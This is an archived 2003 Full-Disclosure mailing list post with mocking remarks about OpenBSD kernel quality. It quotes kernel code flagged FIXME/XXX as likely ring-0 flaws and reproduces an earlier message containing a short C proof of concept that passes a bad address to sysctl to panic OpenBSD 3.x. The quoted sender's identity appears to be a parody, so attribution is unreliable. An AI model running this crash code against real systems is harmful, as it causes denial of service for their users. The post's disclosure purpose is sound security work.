lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <Pine.GSO.4.44.0311201652010.15389-100000@sodom.uberhax0r.net>
From: noir at uberhax0r.net (noir@...rhax0r.net)
Subject: OpenBSD kernel panic, yet still O*BSD much
 worse than MS-DoS 6.0

i can confirm this SECURITY vulnerability on all openbsd 3.x.
so apperantly searching for "XXX" and/or "FIXME" strings in obsd
kernel is a guaranteed way to locate a ring 0 vulnerability ...
nice, real nice ;P

some examples;

		char buf[128], *bufp;   /* FIXME */
                int len = sh.s_size, path_index, entry_len;

                /* DPRINTF(("COFF shlib size %d offset %d\n",
                         sh.s_size, sh.s_scnptr)); */

                error = vn_rdwr(UIO_READ, epp->ep_vp, (caddr_t) buf,
                                len, sh.s_scnptr,
...

/*
 * vslock: wire user memory for I/O
 *
 * - called from physio and sys___sysctl
 * - XXXCDC: consider nuking this (or making it a macro?)
 */

void
uvm_vsunlock(p, addr, len)
        struct proc *p;
        caddr_t addr;
        size_t  len;
{
        uvm_fault_unwire(&p->p_vmspace->vm_map, trunc_page((vaddr_t)addr),
                round_page((vaddr_t)addr + len));
}


grep -rn or cscope is your friend ;)


On Wed, 19 Nov 2003 crispin@...unix.com wrote:

>
> ppl think "hey, local DoS sucks", therefore they are.
> i think "hey, obsd sucks", therefore i am.
>
>
> #include <stdio.h>
> #include <sys/param.h>
> #include <sys/sysctl.h>
>
> int main ()
> {
>         unsigned int blah[2] = { CTL_KERN, 0 }, addr = -4096 + 1;
>
>         return (sysctl (blah, 2, (void *) addr, &blah[1], 0, 0));
> }
>
> it's wide, it's opened, it's surely obsd!
>
> --
> Crispin Coward, Ph.D.          http://immunix.com/~crispin/
> Chief Scientist, Immunix       http://immunix.com
>             http://www.immunix.com/tosell/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ